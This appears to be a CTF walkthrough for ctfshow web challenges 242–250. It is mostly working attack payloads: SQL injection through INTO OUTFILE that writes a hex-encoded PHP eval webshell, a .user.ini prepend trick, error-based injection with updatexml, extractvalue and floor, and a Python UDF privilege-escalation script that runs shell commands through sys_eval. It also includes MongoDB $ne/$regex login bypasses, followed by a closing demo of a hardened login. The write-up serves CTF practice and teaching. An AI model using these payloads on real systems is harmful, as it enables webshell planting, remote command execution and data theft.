  $sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

Solve it using the extended options of into outfile

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']  -- field separator
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]
The OPTION parameters are optional; their possible values are:

`FIELDS TERMINATED BY 'string'`: sets the string used as the separator between fields; one or more characters. The default is "\t".

`FIELDS ENCLOSED BY 'char'`: sets the character used to enclose field values; a single character only. By default no character is used.

`FIELDS OPTIONALLY ENCLOSED BY 'char'`: sets the character used to enclose string-typed fields such as CHAR, VARCHAR and TEXT. By default no character is used.

`FIELDS ESCAPED BY 'char'`: sets the escape character; a single character only. The default is "\".

`LINES STARTING BY 'string'`: sets the characters at the start of every data row; one or more characters. By default none is used.

`LINES TERMINATED BY 'string'`: sets the characters at the end of every data row; one or more characters. The default is "\n".

Options that can be used to write a shell:

FIELDS TERMINATED BY, LINES STARTING BY, LINES TERMINATED BY

Write the shell via url/api/dump.php

The shell ends up at url/dump/1.php

filename=1.php' LINES STARTING BY "";#

From the command line, go to the root directory and run

find / -name "f*" | xargs grep "ctfshow"

web243

SQL statement

  // back up the table
  $sql = "select * from ctfshow_user into outfile '/var/www/html/dump/{$filename}';";

Return logic

  // php is filtered

The previous challenge's payload needed the string php, which is now blocked. I am not sure whether phtml works, but the key point here is .user.ini: auto_append_file=1.png or auto_prepend_file=1.png

Revisiting the parameters from the previous challenge:

FIELDS TERMINATED BY: sets the string used as the separator between fields; one or more characters. The default is "\t".

LINES STARTING BY 'string': sets the characters at the start of every data row; one or more characters. By default none is used.

LINES TERMINATED BY 'string': sets the characters at the end of every data row; one or more characters. The default is "\n".

payload:

First the ini:

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e706e670a;#

Note the hex is there so that 0a (newline) takes effect; STARTING BY ";" makes every data row begin with a semicolon, which cuts off whatever select * from ctfshow_user returns from what follows.

Then the png:

filename=1.png' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#

When connecting, note that the path is /dump/index.php


web244, 245: error-based injection

SQL statement

  // back up the table
  $sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 1;";

The two forms of error-based injection:

extractvalue(target xml document, xml path): a function that queries an XML document

updatexml(target xml document, xml path, new content): a function that updates an XML document

Both inject through the xml path argument

payload:

updatexml:
?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,32),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select left(flag,32) from ctfshow_flag),0x7e),1)+--+

?id=1' or updatexml(1,concat(0x7e,(select right(flag,32) from ctfshow_flag),0x7e),1)+--+

extractvalue:
?id=1' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))+--+

?id=1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),20,30),0x7e))+--+

web246: floor error-based injection

**floor error-based injection:** relies on a duplicate key to trigger the error

?id=1' union select 1,count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2))b from information_schema.tables group by b-- -

?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1), 0x7e,floor(rand(0)*2))b from information_schema.tables group by b -- -

?id=1' union select 1,count(*),concat(0x7e,(select flag2 from ctfshow_flags),0x7e,floor(rand(0)*2))b from information_schema.tables group by b-- -

web247: double-query error-based injection

floor(): round down
ceil(): round up
round(): round to nearest

Just replace floor with another rounding function

?id=1' union select 1,count(*),concat((select `flag?` from ctfshow_flagsa ), 0x7e,round(rand(0)*2))b from information_schema.tables group by b -- -

web248: UDF injection

udf: user-defined function

/api/?id=1'; select @@plugin_dir; -- -
Find the MySQL plugin path: /usr/lib/mariadb/plugin/

/api/?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+
Load the udf.so file to create the function sys_eval

Privilege-escalation exploit:

import requests

base_url="http://3f801e10-5c58-42bf-a5cf-8a588d3bfe9c.challenge.ctf.show:8080/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = ""  # hex-encoded udf.so; the blob is omitted from the page
for i in range(0,21510, 5000):
    end = i + 5000
    payload.append(udf[i:end])

p = dict(zip(text, payload))

for t in text:
    url = base_url+"?id=';select unhex('{}') into dumpfile '/usr/lib/mariadb/plugin/{}.txt'--+&page=1&limit=10".format(p[t], t) # UDF privilege escalation usually uses dumpfile rather than outfile
    r = requests.get(url)
    print(r.status_code)

next_url = base_url+"?id=';select concat(load_file('/usr/lib/mariadb/plugin/a.txt'),load_file('/usr/lib/mariadb/plugin/b.txt'),load_file('/usr/lib/mariadb/plugin/c.txt'),load_file('/usr/lib/mariadb/plugin/d.txt'),load_file('/usr/lib/mariadb/plugin/e.txt')) into dumpfile '/usr/lib/mariadb/plugin/udf.so'-- +&page=1&limit=10" # merge the txt files into udf.so
rn = requests.get(next_url)

uaf_url=base_url+"?id=';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';--+" # create the UDF function
r=requests.get(uaf_url)
nn_url = base_url+"?id=';select sys_eval('cat /flag.*');-- +&page=1&limit=10" # run the command and read the output
rnn = requests.get(nn_url)
print(rnn.text)

web249: NoSQL injection

Reference articles:
NoSQL injection notes
Obscure knowledge: how much do you know about NoSQL injection

Search for Memcache::get:
it says that if an array is passed, the first element of the array is returned

/api/?id[]=flag

web250

// SQL statement
  $query = new MongoDB\Driver\Query($data);
  $cursor = $manager->executeQuery('ctfshow.ctfshow_user', $query)->toArray();
  // return logic, no filtering
  if(count($cursor)>0){
    $ret['msg']='登陆成功';
    array_push($ret['data'], $flag);
  }

NoSQL injection notes
Obscure knowledge: how much do you know about NoSQL injection
MongoDB is a kind of NoSQL database; two MongoDB operators to introduce:
$ne: != not equal
$regex: regular-expression match

username[$ne]=1&password[$ne]=1
username[$regex]=.&password[$regex]=.
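An added example, not the challenge's code, showing in Python why the web250 login accepts the two payloads above: PHP turns bracket syntax into nested arrays, the driver turns those into a MongoDB filter carrying operators, and count($cursor) > 0 then passes. The user collection and a minimal matcher for equality, $ne and $regex are constructed here; the hardened login rejects anything but plain strings.

```python
import re
from typing import Any
from urllib.parse import parse_qs

# Constructed stand-in for the ctfshow.ctfshow_user collection.
USERS = [
    {"username": "admin", "password": "constructed-secret-1"},
    {"username": "user1", "password": "constructed-secret-2"},
]


def parse_php_query(qs: str) -> dict:
    """Parse a query string the way PHP does for one level of key[sub]=value."""
    out: dict = {}
    for raw_key, values in parse_qs(qs, keep_blank_values=True).items():
        value = values[-1]  # PHP keeps the last repeated key
        if "[" in raw_key and raw_key.endswith("]"):
            key, sub = raw_key[:-1].split("[", 1)
            out.setdefault(key, {})[sub] = value
        else:
            out[raw_key] = value
    return out


def matches(doc: dict, filt: dict) -> bool:
    """Minimal MongoDB filter evaluation: equality, $ne and $regex only."""
    for field, cond in filt.items():
        actual = doc.get(field)
        if not isinstance(cond, dict):
            if actual != cond:
                return False
            continue
        for op, arg in cond.items():
            if op == "$ne":
                if actual == arg:
                    return False
            elif op == "$regex":
                if not isinstance(actual, str) or re.search(arg, actual) is None:
                    return False
            else:
                raise ValueError(f"unsupported operator {op}")
    return True


def login_vulnerable(qs: str) -> bool:
    """Mirrors the challenge: the parsed request becomes the query filter as-is."""
    filt = parse_php_query(qs)
    return sum(matches(u, filt) for u in USERS) > 0


def contains_operator(value: Any) -> bool:
    """True if a (possibly nested) value carries an operator key such as $ne or $regex."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def login_hardened(qs: str) -> bool:
    """Reject operator objects and non-string credentials before building the filter."""
    data = parse_php_query(qs)
    if contains_operator(data):
        raise ValueError("operator injection attempt")
    filt = {f: data.get(f) for f in ("username", "password")}
    if not all(isinstance(v, str) for v in filt.values()):
        raise ValueError("username and password must be plain strings")
    return sum(matches(u, filt) for u in USERS) > 0


if __name__ == "__main__":
    print(login_vulnerable("username[$ne]=1&password[$ne]=1"))     # True
    print(login_hardened("username=admin&password=wrong"))          # False
```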
